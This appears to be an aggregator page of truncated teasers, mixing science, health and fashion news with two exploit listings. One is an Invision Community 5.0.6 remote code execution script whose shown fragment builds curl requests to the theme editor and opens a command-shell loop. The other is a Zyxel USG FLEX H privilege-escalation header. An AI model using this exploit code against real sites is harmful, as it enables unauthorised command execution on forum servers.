Invision Community 5.0.6 – Remote Code Execution (RCE)

\n”; print “\nExample….: php $argv[0] http://localhost/invision/”; print “\nExample….: php $argv[0] https://invisioncommunity.com/\n\n”; die(); } $ch = curl_init(); $params = [“app” => “core”, “module” => “system”, “controller” => “themeeditor”, “do” => “customCss”]; curl_setopt($ch, CURLOPT_URL, $argv[1]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); while (1) { print “\ninvision-shell# “; if (($cmd =…

Read More

Mystery of Pachyrhinosaurus mass grave in Canada

Rebecca Morelle Science editor Reporting fromAlberta, Canada Alison Francis Senior science journalist A tour of the bones being unearthed at Pipestone Creek Hidden beneath the slopes of a lush forest in Alberta, Canada, is a mass grave on a monumental scale. Thousands of dinosaurs were buried here, killed in an instant on a day of…

Read More

Walgreens and KFF’s Greater Than Campaign to Offer Free HIV/STD Testing in Stores on June 27

DEERFIELD, Ill. & SAN FRANCISCO, June 12, 2025 –  Walgreens and Greater Than HIV/STDs, a public information campaign from KFF, are joining with health departments and community organizations to provide free rapid HIV, syphilis and hepatitis C testing at more than 575 Walgreens stores on June 27 for the nation’s largest National HIV Testing Day (NHTD) event. …

Read More

Khloé Kardashian’s Good American brand launches on ASOS

ASOS continues to bulk up in its third-party brands with the high-profile arrival of Good American to its expansive fashion platform.  Good American The “trailblazing” global womenswear brand, co-founded by Khloé Kardashian and British entrepreneur Emma Grede, arrives with a clear vision, “to redefine fashion with styles that empower women”. Founded in 2016, Good American…

Read More

Zyxel USG FLEX H series uOS 1.31 – Privilege Escalation

# Exploit Title: Zyxel USG FLEX H series uOS 1.31 – Privilege Escalation # Date: 2025-04-23 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.zyxel.com/ # Version: Zyxel uOS V1.31 (see https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= =3D advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= =3D ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) # Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel FLEX200H with Firmware V1.31(ABWV.0) # CVE: CVE-2025-1731 …

Read More